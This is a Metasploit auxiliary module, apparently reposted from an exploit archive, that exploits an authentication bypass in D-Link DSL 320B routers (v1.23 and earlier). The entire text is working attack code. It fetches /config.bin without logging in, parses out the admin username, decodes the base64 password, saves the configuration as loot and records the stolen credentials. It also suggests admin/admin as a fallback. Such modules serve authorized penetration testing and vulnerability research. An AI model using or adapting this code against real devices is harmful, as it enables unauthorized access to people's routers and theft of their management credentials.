Share
## https://sploitus.com/exploit?id=PACKETSTORM:180849
##  
# This module requires Metasploit: https://metasploit.com/download  
# Current source: https://github.com/rapid7/metasploit-framework  
##  
  
class MetasploitModule < Msf::Auxiliary  
include Msf::Exploit::Remote::HttpClient  
include Msf::Auxiliary::Report  
  
def initialize  
super(  
'Name' => 'D-Link DSL 320B Password Extractor',  
'Description' => %q{  
This module exploits an authentication bypass vulnerability in D-Link DSL 320B  
<=v1.23. This vulnerability allows to extract the credentials for the remote  
management interface.  
},  
'References' => [  
[ 'EDB', '25252' ],  
[ 'OSVDB', '93013' ],  
[ 'URL', 'http://www.s3cur1ty.de/m1adv2013-018' ]  
],  
'Author' => [  
'Michael Messner <devnull[at]s3cur1ty.de>'  
],  
'License' => MSF_LICENSE  
)  
end  
  
def run  
vprint_status("#{rhost}:#{rport} - Trying to access the configuration of the device")  
  
# download configuration  
begin  
res = send_request_cgi({  
'uri' => '/config.bin',  
'method' => 'GET'  
})  
  
return if res.nil?  
return if (res.headers['Server'].nil? || res.headers['Server'] !~ (/micro_httpd/))  
return if (res.code == 404)  
  
if res.body =~ (/sysPassword value/) || res.body =~ (/sysUserName value/)  
if res.body !~ /sysPassword value/  
print_status("#{rhost}:#{rport} - Default Configuration of DSL 320B detected - no password section available, try admin/admin")  
else  
print_good("#{rhost}:#{rport} - Credentials successfully extracted")  
end  
  
# store all details as loot -> there is some useful stuff in the response  
loot = store_loot('dlink.dsl320b.config', 'text/plain', rhost, res.body)  
print_good("#{rhost}:#{rport} - Configuration of DSL 320B downloaded to: #{loot}")  
  
user = ''  
pass = ''  
  
res.body.each_line do |line|  
if line =~ %r{<sysUserName\ value="(.*)"/>}  
user = ::Regexp.last_match(1)  
next  
end  
next unless line =~ %r{<sysPassword\ value="(.*)"/>}  
  
pass = ::Regexp.last_match(1)  
pass = Rex::Text.decode_base64(pass)  
print_good("#{rhost}:#{rport} - Credentials found: #{user} / #{pass}")  
  
connection_details = {  
module_fullname: fullname,  
username: user,  
private_data: pass,  
private_type: :password,  
workspace_id: myworkspace_id,  
proof: line,  
status: Metasploit::Model::Login::Status::UNTRIED  
}.merge(service_details)  
create_credential_and_login(connection_details)  
end  
end  
rescue ::Rex::ConnectionError  
vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")  
return  
end  
end  
end